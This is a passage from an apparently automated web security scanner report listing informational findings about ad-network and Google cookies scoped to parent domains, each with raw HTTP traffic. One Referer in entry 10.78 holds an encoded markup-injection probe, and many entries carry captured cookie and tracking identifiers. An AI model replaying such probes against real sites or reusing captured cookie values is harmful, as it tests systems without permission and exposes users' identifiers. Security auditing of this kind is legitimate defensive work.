Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgCIAIoAjCO5qHxBBCO5qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb830793=5_[r^kI/7ZdzkzB7=/Cb<tqGY?enc=bYlccAb_6z98SFOYUjLpPwAAAMDMzARAfEhTmFIy6T9uiVxwBv_rP-_NrhooA3Y_g472aqBQbloOcyhOAAAAAAw8AwA3AQAAZAAAAAIAAAC2awgA510AAAEAAABVU0QAVVNEANgCWgCqAQAAiBABAgUCAQUAAAAAcCHMDAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+27%2C+1311273742%29%3Buf%28%27r%27%2C+551862%2C+1311273742%29%3Bppv%2882%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2884%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2811%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2882%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2884%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3B&cnd=!6R9uLQjXiAQQttchGAAg57sBMAM4qgNAAEhkUIz4DFgAYEtoAHAAeACAAQCIAQCQAQGYAQGgAQSoAQOwAQC5AQHJSSsG_-s_wQEByUkrBv_rP8kBCtejcD0K8z_ZAQAAAAAAAPA_4AHhHQ..&ccd=!BQXcKAjXiAQQttchGOe7ASAA&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66647; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8MLb?.YT-A[C-9NtjX!!g[P's06h<>c)B@V8I%-UY1%%5; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:42:22 GMT
Content-Length: 414

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10101735942_1311273740,11fda490648f83c,noc,ax.60-cm.games_h-bz.25;;cmw=nowl
...[SNIP]...

10.71. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
icu=ChEIz34QChgCIAIoAjDV0qHxBBDV0qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
acb390451=5_[r^208WM^9#a*>bPMvSdL7A?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwP9QC9eWCJ9pXg472aqBQblpVaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAAwREBAgUCAQUAAAAApCDOoQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271253%29%3Buf%28%27c%27%2C+39654%2C+1311271253%29%3Buf%28%27r%27%2C+425550%2C+1311271253%29%3Bppv%281279%2C+%276330415669379924692%27%2C+1311271253%2C+1311876053%2C+39654%2C+24039%29%3Bppv%285150%2C+%276330415669379924692%27%2C+1311271253%2C+1311357653%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8ML`j]Wy`3:#7I9PoKK9quf^[F$tC40Ivv=-wxAh-.NxO; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10306552516_1311271251,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1520731557%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.I>u3?!7G'6v$WPt[fR4#aoQ.`e#:wJBP@1>+^X$?SUr+(fV+'zvLnT#=)OqIw

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgCIAIoAjDV0qHxBBDV0qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb390451=5_[r^208WM^9#a*>bPMvSdL7A?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwP9QC9eWCJ9pXg472aqBQblpVaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAAwREBAgUCAQUAAAAApCDOoQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271253%29%3Buf%28%27c%27%2C+39654%2C+1311271253%29%3Buf%28%27r%27%2C+425550%2C+1311271253%29%3Bppv%281279%2C+%276330415669379924692%27%2C+1311271253%2C+1311876053%2C+39654%2C+24039%29%3Bppv%285150%2C+%276330415669379924692%27%2C+1311271253%2C+1311357653%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8ML`j]Wy`3:#7I9PoKK9quf^[F$tC40Ivv=-wxAh-.NxO; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 385

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;;cmw=owl;sz=300x25
...[SNIP]...

10.72. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:43:38 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEhzW%<rg(XV)`CZ8D]cc2F!S!.[<DRlcnF3$Kcn6`pkhkA<7Rq^*hF#*/D]^!w7Nfw7w826zNu!NInUk.sETw9j)%CDqMp.3PSzP3W2t:ub.<H/3Fqh; path=/; expires=Wed, 19-Oct-2011 18:43:38 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=18004,21295&remove=14924,17995,17996,17997,17998,17999,18000,18001,18002,18003,37689,38793&t=2 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=300x250&site=MYB
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG6kGcvjr/?0P(*AuB-u**g1:XIDv6EhzW%<rg(XV)`CZ8D]cc=P#sv.[<D9^*zOl`pkhkA<7Rq^*hF#*/D]^!w7Nfw7w826zNu!NInTvqHO+h[2%jjHX)N%P@XG#!ug]6!M'0[:3!?k; icu=ChEIz34QChgDIAMoAzDO5qHxBBDO5qHxBBgC; acb644943=5_[r^208WM@!!'#!@@-#QO>4D?enc=KVyPwvUozD_y0k1iEFjJPwAAAEAzMwNA8tJNYhBYyT8pXI_C9SjMPzAV0uFmJK05g472aqBQblpOcyhOAAAAAAw8AwA3AQAAsQAAAAIAAACo0gIA510AAAEAAABVU0QAVVNEACwB-gCqAQAARgcBAgUCAQUAAAAAciEQAAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+379%2C+1311273806%29%3Buf%28%27c%27%2C+50689%2C+1311273806%29%3Buf%28%27r%27%2C+185000%2C+1311273806%29%3Bppv%2810546%2C+%274156018055426741552%27%2C+1311273806%2C+1321641806%2C+50689%2C+24039%29%3B&cnd=!px7g_AiBjAMQqKULGAAg57sBMAA4qgNAAEixAVCM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAEBqAEDsAEAuQEpXI_C9SjMP8EBKVyPwvUozD_JATMzMzMzM_c_2QEAAAAAAADwP-ABAA..&ccd=!XAT7IQiBjAMQqKULGOe7ASAA

Response

10.73. http://id.google.com/verify/EAAAADlr6isilNNYzGAaxKhrZpM.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAADlr6isilNNYzGAaxKhrZpM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=49=YQfbQhnwZq2E9xtBUjN4AP0Gc8CYGlrxNmgTjTke=pg5Xi5kUL37hGytj; expires=Fri, 20-Jan-2012 19:00:34 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADlr6isilNNYzGAaxKhrZpM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Jack+Henry+&+Associates
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=49=joDUx0o6Tkrk6O6Xsaw8aiHs2pIjfN-oVDn4Xep9=e6oK97n-YOBLc7UU; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=hF3sNFzNDiZMKMwt0WZVsaf-tISuy02NG32GFzcjWjmHZDjyHO4cH85LuW7T8eHtFsOa_-uBcVgFtj8eePDVp7JiXpDa_p72IxDR6LUJuVTSf2YVSO5Uj8_SPahG4RWl

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=YQfbQhnwZq2E9xtBUjN4AP0Gc8CYGlrxNmgTjTke=pg5Xi5kUL37hGytj; expires=Fri, 20-Jan-2012 19:00:34 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 21 Jul 2011 19:00:34 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.74. http://id.google.com/verify/EAAAAEwMF-hbQc293ckILMv5etg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAEwMF-hbQc293ckILMv5etg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=49=nwK0YeFQgiA75AfdZgSdSHlwxJbK2A2cV_USi565w0PVqPxP8Z_r44EtseUIkjPH9QzYcj49dhKdG9KIrxQkEfj8lGl3kOkFx8-uLi3G6X3lprtx8Eqr5zx5hUV0AOyO; expires=Fri, 20-Jan-2012 19:05:10 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAEwMF-hbQc293ckILMv5etg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=49=YQfbQhnwZq2E9xtBUjN4AP0Gc8CYGlrxNmgTjTke=pg5Xi5kUL37hGytj; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=hF3sNFzNDiZMKMwt0WZVsaf-tISuy02NG32GFzcjWjmHZDjyHO4cH85LuW7T8eHtFsOa_-uBcVgFtj8eePDVp7JiXpDa_p72IxDR6LUJuVTSf2YVSO5Uj8_SPahG4RWl

Response

HTTP/1.1 200 OK
Set-Cookie: NID=49=nwK0YeFQgiA75AfdZgSdSHlwxJbK2A2cV_USi565w0PVqPxP8Z_r44EtseUIkjPH9QzYcj49dhKdG9KIrxQkEfj8lGl3kOkFx8-uLi3G6X3lprtx8Eqr5zx5hUV0AOyO; expires=Fri, 20-Jan-2012 19:05:10 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 21 Jul 2011 19:05:10 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.75. http://id.google.com/verify/EAAAAFtbipzwLyDvaVuyeCeXNM4.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAFtbipzwLyDvaVuyeCeXNM4.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=49=NedNUC6_RmfO1ScbAB6HdsDVZgHnbMpKQ3dZpxPV_DW4XLhRFvH0w3s_KbeuNJe4Au8_bHU_HacJFE_HlY0PmaBL8lChw51FPLFWL4jQdFPFJZqj5hX5hMzFawKskVpl; expires=Sun, 22-Jan-2012 01:55:44 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAFtbipzwLyDvaVuyeCeXNM4.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=49=-d6rONSHBudLe67hoL5L5TGY_CPfh6LiI_Ppg8nX=1XZONvgNKGrovohz; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Set-Cookie: NID=49=NedNUC6_RmfO1ScbAB6HdsDVZgHnbMpKQ3dZpxPV_DW4XLhRFvH0w3s_KbeuNJe4Au8_bHU_HacJFE_HlY0PmaBL8lChw51FPLFWL4jQdFPFJZqj5hX5hMzFawKskVpl; expires=Sun, 22-Jan-2012 01:55:44 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 23 Jul 2011 01:55:44 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.76. http://id.google.com/verify/EAAAAOJV-bC0aOnp7SAOnBJZllE.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAOJV-bC0aOnp7SAOnBJZllE.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=49=jhVzWxKmsK3UU2bX6d13fzG9nrnbGjConi0xU2VQ=tV97_MCQzy86OjID; expires=Sun, 22-Jan-2012 12:19:30 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAOJV-bC0aOnp7SAOnBJZllE.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Norris+McLaughlin+and+Marcus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=49=-d6rONSHBudLe67hoL5L5TGY_CPfh6LiI_Ppg8nX=1XZONvgNKGrovohz; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=jhVzWxKmsK3UU2bX6d13fzG9nrnbGjConi0xU2VQ=tV97_MCQzy86OjID; expires=Sun, 22-Jan-2012 12:19:30 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 23 Jul 2011 12:19:30 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.77. http://id.google.com/verify/EAAAAO_wEIygyxFXLeRT2ha2P9w.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAO_wEIygyxFXLeRT2ha2P9w.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=49=-d6rONSHBudLe67hoL5L5TGY_CPfh6LiI_Ppg8nX=1XZONvgNKGrovohz; expires=Sun, 22-Jan-2012 01:55:25 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAO_wEIygyxFXLeRT2ha2P9w.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Microsoft+Research
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=49=YQfbQhnwZq2E9xtBUjN4AP0Gc8CYGlrxNmgTjTke=pg5Xi5kUL37hGytj; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=-d6rONSHBudLe67hoL5L5TGY_CPfh6LiI_Ppg8nX=1XZONvgNKGrovohz; expires=Sun, 22-Jan-2012 01:55:25 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 23 Jul 2011 01:55:25 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.78. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734339&11206=734324&7382=734325&11095=734330&10421=734339; domain=.interclick.com; expires=Thu, 22-Jul-2021 20:31:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=ec2fb961-e98b-4bdc-a1ff-23df1f326889 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322; sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734339&11206=734324&7382=734325&11095=734330

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734339&11206=734324&7382=734325&11095=734330&10421=734339; domain=.interclick.com; expires=Thu, 22-Jul-2021 20:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Fri, 22 Jul 2011 20:31:11 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

10.79. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

KRTBCOOKIE_80=1336-2ecd6c1e-5306-444b-942d-9108b17fd086.38747.66267.38582.39303.; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:01:08 GMT; path=/
PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268; domain=pubmatic.com; expires=Sun, 20-Jul-2014 13:38:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA%3D&piggybackCookie=2ecd6c1e-5306-444b-942d-9108b17fd086.38747.66267.38582.39303. HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256; KTPCACOOKIE=YES; PUBMDCID=2; pubfreq_26922=; pubtime_26922=TMC; pubfreq_26922_21908_67256883=165-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:08 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_80=1336-2ecd6c1e-5306-444b-942d-9108b17fd086.38747.66267.38582.39303.; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:01:08 GMT; path=/
Set-Cookie: PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268; domain=pubmatic.com; expires=Sun, 20-Jul-2014 13:38:06 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.80. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

